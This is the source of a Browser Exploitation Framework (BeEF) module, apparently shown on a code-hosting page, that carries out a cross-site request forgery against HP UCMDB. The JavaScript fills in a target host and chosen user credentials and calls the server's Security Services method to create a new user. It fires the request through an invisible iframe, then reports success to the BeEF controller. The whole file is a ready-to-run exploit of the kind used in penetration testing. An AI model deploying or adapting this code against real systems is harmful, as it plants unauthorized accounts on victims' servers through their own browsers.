Path: blob/master/modules/exploits/hp_ucmdb_add_user_csrf/command.js
1154 views
/*1* Copyright (c) 2006-2025Wade Alcorn - [email protected]2* Browser Exploitation Framework (BeEF) - https://beefproject.com3* See the file 'doc/COPYING' for copying permission4*/56beef.execute(function() {7var protocol = '<%= @protocol %>';8var host = '<%= @host %>';9var port = '<%= @port %>';10var usertype = '<%= @usertype %>';11var customerid = '<%= @customerid %>';12var username = '<%= @username %>';13var password = '<%= @password %>';1415var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;16url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;1718if (usertype == 'createIntegrationUser'){19url += '&arg3=';20}2122var ucmdb_iframe = beef.dom.createInvisibleIframe();23ucmdb_iframe.setAttribute('src', url);2425cleanup = function() {26document.body.removeChild(ucmdb_iframe);27}28setTimeout("cleanup()", 15000);2930beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");31});323334